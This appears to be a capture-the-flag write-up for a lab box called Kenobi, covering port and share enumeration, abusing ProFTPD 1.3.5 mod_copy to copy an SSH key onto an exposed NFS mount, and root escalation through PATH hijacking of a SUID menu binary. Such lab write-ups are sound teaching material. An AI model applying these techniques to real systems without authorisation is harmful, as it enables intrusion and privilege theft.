wide Kylo for good luck

Enumeration

Greetings Jedi! We can find the Kenobi room here. Lets begin our first scan to determine open ports.

sudo nmap -p- -T4 10.10.110.39 -v

We don’t have to worry about those ‘unknown’ ports

  • Port 111, 139, 445 tell me that this box is possibly running some sort of file share which will be of importance to us.
  • Port 21 and 80 will be our most obvious targets to look at next.

Let’s try FTP anonymous log-on first.

We see that anonymous login is ok, we try test@test.com and a blank password, no luck on both. Either way, we’ve enumerated a service name and version type which is very useful: ProFTPD 1.3.5.

Next, we want to take a look at the webserver. We’re gonna run gobuster to enumerate directories while we poke around and look for the usual suspects.

sudo gobuster dir -w /opt/directory-list-2.3-medium.txt -t 40 -u 10.10.110.39

There’s nothing interesting on the home page, source code, or cookies - but we do have a robots page with a hidden directory.

Unfortunately, it seems to be a red herring as Admiral Ackbar so succinctly puts it.

Gobuster didn’t return any directories so we’re going to 86 the webserver for now and enumerate SMB. We can do this with SMBMap.

smbmap -H 10.10.110.39

_ the dollar sign tells us a share is hidden _

Note the permissions on ‘anonymous’. Let’s try seeing what’s in there with smbclient.

smbclient //10.10.110.39/anonymous

Looking at the file from /anonymous, we see some interesting things but no credentials or easy wins there.

Finally, we’re gonna go back to the rpcbind service and enumerate with nmap.

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.110.39

We can see the mountpoint /var which will be useful soon.

Initial Access

We have a service version on FTP we can look at for possible exploits. There’s 3 that look good.

The mod_copy module allows use to copy files and directories between locations on the server, useful for an administrator, even more so for an attacker. We can exploit this by moving files to the mount point we found earlier, /var. While we couldn’t log onto the FTP server before, we can still issue mod_copy commands unauthenticated with a tool like netcat.

Now we just need to mount /var and kenobi’s ssh key will be sitting in the /tmp folder!

mkdir /tmp/kenobi
sudo mount:10.10.110.39/var /tmp/kenobi

Privilege Escalation

We start with the usual enumerations

sudo -l

Turns up nothing because we don’t have a sudo password.

Next let’s look for files with the SUID bit set.

find / -type f -perm -u=s 2>/dev/null

Hmm, /usr/bin/menu seems to stand out right away, let’s take a look and see what it does.

So we are presented with a menu, upon choosing 1, 2, or 3, the program performs a function. Running strings on this program we can see that it uses a couple familiar bash programs; curl, uname, ifconfig and the danger lies in the fact these binaries are running without a full path (e.g. /bin/curl vs. curl). Because of this misconfiguration we can create our own program, name it curl, and it will get executed as root since /usr/bin/menu uses the SUID bit.

And that’s Kenobi - have a nice day and thanks for reading 🙂